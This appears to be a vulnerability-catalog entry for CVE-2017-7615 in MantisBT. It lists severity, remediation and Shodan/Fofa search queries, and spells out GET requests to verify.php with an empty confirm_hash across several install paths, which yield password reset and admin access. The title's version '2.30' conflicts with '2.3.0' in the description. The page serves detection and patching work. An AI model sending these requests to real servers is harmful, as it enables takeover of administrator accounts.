🔙 목록으로 돌아가기

CVE-2017-7615: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access

TitleMantisBT <=2.30 - Arbitrary Password Reset/Admin Access
Authorbp0lr,dwisiswant0
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized password resets and unauthorized administrative access.
RemediationUpgrade MantisBT to a version higher than 2.30 to mitigate this vulnerability.
CVSS Score8.8
EPSS Score0.93166
CVE IDCVE-2017-7615
CWE IDCWE-640
Shodan Queryhttp.favicon.hash:662709064cpe:"cpe:2.3:a:mantisbt:mantisbt"
Fofa Queryicon_hash=662709064
Tags cve cve2017 mantisbt unauth edb vuln

🔍 Vulnerability Description

MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.

🌐 HTTP Request

GET /verify.php?id=1&confirm_hash HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 108) AppleWebKit/536.15 (KHTML like Gecko) Version/6.0 Safari/536.16
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.4 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/140.0.2 (x64 de)
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-7615.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-7615.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A